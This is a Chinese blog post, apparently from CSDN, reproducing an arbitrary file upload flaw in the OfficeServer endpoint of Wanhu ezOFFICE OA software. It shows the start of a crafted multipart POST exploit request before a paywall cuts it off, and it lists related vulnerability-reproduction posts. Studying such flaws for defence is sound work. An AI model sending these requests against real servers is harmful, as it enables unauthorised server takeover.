万户ezOFFICE OfficeServer接口任意文件上传

最新推荐文章于 2024-08-10 15:40:03 发布
最新推荐文章于 2024-08-10 15:40:03 发布
阅读量114 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136468986
版权
本文详细介绍了万户OA软件中OfficeServer接口存在的任意文件上传漏洞,攻击者能够利用此漏洞上传任意文件,对服务器安全构成威胁。通过构造数据包并验证上传文件路径来复现漏洞。
摘要由CSDN通过智能技术生成

漏洞描述

万户OA(Office Automation)是一款企业级协同办公管理软件,旨在为企业提供全面的办公自动化解决方案。 万户ezOFFICE OfficeServer接口存在任意文件上传漏洞。攻击者可以通过此漏洞上传任意文件到目标服务器,导致攻击者可获取服务器控制权限。

漏洞复现

  1. 构造上传数据包。
POST /defaultroot/OfficeServer HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Length: 583
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk7uGGNUWdMDRBbBV
Cookie: OASESSIONID=x; LocLan=zh_CN;

------WebKitFormBoundaryk7uGGNUWdMDRBbBV
Content-Disposition: form-data; name="value1"

{"OPTION":"SAVEPDF"}
------WebKitFormBoundaryk7uGGNUWdMDRBbBV
Content-Disposi
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
万户 OA OfficeServer.jsp 任意文件上传漏洞复现
0xSec
12-16 1269
万户OA OfficeServer.jsp接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件从而控制整个服务器。
万户ezOFFICE wpsservlet任意文件上传漏洞复现
0xSec
11-30 1361
万户ezOFFICE协同管理平台wpsservlet接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件,造成代码执行或服务器失陷。 ​
Goby 漏洞更新 | 万户 OA OfficeServer.jsp 任意文件上传漏洞
m0_46699477的博客
04-27 1751
ezOFFICE OA是面向政府机关、企事业单位的FlexOffice独立安全协同办公平台。 ezOFFICE OA OfficeServer jsp存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件控制整个服务器。
【漏洞复现】泛微e-office OfficeServer2.php 存在任意文件读取漏洞复现
做自己喜欢的事,并将其发挥到极致!
09-12 788
泛微e-office OfficeServer2.php 存在任意文件读取漏洞,攻击者可通过构造特定Payload获取敏感数据信息。
E-office Server_v9.0 漏洞分析
蚁景网安学院
09-27 425
漏洞简介泛微e-office是一款标准化的协同OA办公软件,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。由于泛微 E-Office 未能正确处理上传模块中输入的数据,未授权的攻击者可以构造恶意数据包发送给服务器,实现任意文件上传,并且获得服务器的webshell,成功利用该漏洞可以获取服务器控制权。未授权的攻击者可以构造恶...
万户oa漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-25 2268
万户oa漏洞复现:万户oa漏洞详情 /defaultroot/officeserverservlet 路径存在文件上传漏洞 万户oa漏洞复现 POST /defaultroot/officeserverservlet HTTP/1.1 Host: XXXXXXXXX:7001 Content-Length: 782 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://XXXXXXXX7001 User-Agent
漏洞复现--万户ezoffice wpsservlet任意文件上传
qq_53003652的博客
12-05 1063
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。此系统wpsservlet存在任意文件上传。攻击者可上传恶意脚本文件获取服务器权限。访问/defaultroot/platform/portal/layout/check.jsp。万户ezoffice
万户ezOFFICE数据字典
04-02
万户ezOFFICE数据字典
ezOFFICE安装手册(linux版).doc
11-30
"ezOFFICE安装手册(linux版)" ezOFFICE是基于Linux操作系统的办公自动化软件,在 Linux 平台上安装ezOFFICE需要遵循一定的步骤和要求。以下是ezOFFICE安装手册的详细说明: 安装前准备 在安装ezOFFICE之前,...
EzOffice.exe
06-14
Ashetch GPS数据格式转换,导入导出软件
万户OA启动会PPT教案.pptx
10-02
万户OA启动会PPT教案】是一份详细阐述如何启动和实施万户OA(ezOffice)协同办公系统的专业课件。该课件分为五个章节,详细介绍了项目从规划到执行的全过程。 第一章,项目总体规划及实施阶段步骤,明确了项目...
ezOFFICE协同管理平台使用手册_1.pdf
09-26
ezOFFICE协同管理平台使用手册》是一份详细介绍如何有效使用黑龙江农信协同办公平台的指南,涵盖了系统登录与退出、信息管理、公文管理、内部邮件等多个关键功能。以下是对这些内容的详细阐述: 1. **登录和退出...
网络安全风险扫描原理及工具使用
qyq88888的专栏
08-08 847
通过一定的技术手段发现系统和软件存在的安全漏洞、弱口令。
蓝屏事件:网络安全的启示
m0_67187271的博客
08-04 1475
这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。该事件突显了在快速迭代的软件更新周期中,充分的测试和评估的重要性。通过强化日志管理、质量管理、风险评估以及灾难恢复计划,结合冗余系统设计和自动化监控工具的应用,我们能够显著提高对类似大规模故障的预防能力和应对速度,为确保系统的稳定性和可靠性奠定坚实的基础。
第16节课:Web安全基础——构建安全Web应用
学问小小谢的技术博客
08-08 862
在当今数字化时代,Web安全已成为开发Web应用时的首要考虑因素。保护用户数据和隐私,防止恶意攻击是每个Web开发者的责任。本节课将介绍Web安全的基础概念,重点讨论跨站脚本(XSS)和跨站请求伪造(CSRF)的防护措施。
网络安全应急响应
最新发布
goodxianping的专栏
08-10 223
n\n由于本人水平有限,文章中可能会出现一些错误,欢迎各位大佬指正,网络安全应急响应定义\n网络安全应急响应是指针对已经发生或可能发生的安全事件进行监控、分析、协调、处理,以保护资产安全。\n\n常见的安全事件\n不同的安全事件类型需要不同的应急方式。以下是一些常见的安全事件类型:\n\nWeb入侵:包括挂马、篡改、Webshell等。\n病毒木马:包括远控、后门、勒索软件、挖矿程序等。\n应急响应需解决的问题\n发生上述安全问题时,我们需要解决以下几个关键问题:\n\n本次事件的影响范围有多大?
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 1万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
《密码编码学与网络安全原理与实践》第八章伪随机数与流密码
m0_57291352的博客
08-07 973
伪随机数发生器PRNG,使用算法来生成随机数,算法是确定的,产生的序列并非统计随机的,但可以经受住随机性检测。取一个固定值称为种子作为输入,用一个确定的算法产生位输出序列,通过有反馈路径,由算法的部分结果反馈作为输入,而其他部分作为输出位。用1-256个字节(8-2048位)的可变长度密钥初始化一个256个字节的状态向量S,从始至终S包含从0-255所有的8位数,每产生一个k值,S中的元素个体就被重新置换一次。发生器的输出成为密钥流,密钥流和明文流的每一个字节进行按位异或运算,得到一个密文字节。
万户 ezoffice 文件上传漏洞复现
12-17
万户ezoffice是一个办公软件,用于处理各种办公文档。文件上传漏洞是指系统存在一个安全漏洞,允许攻击者在上传文件时注入恶意代码或者上传非法文件到服务器中。这个问题的产生可能是开发过程中没有充分考虑安全性,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值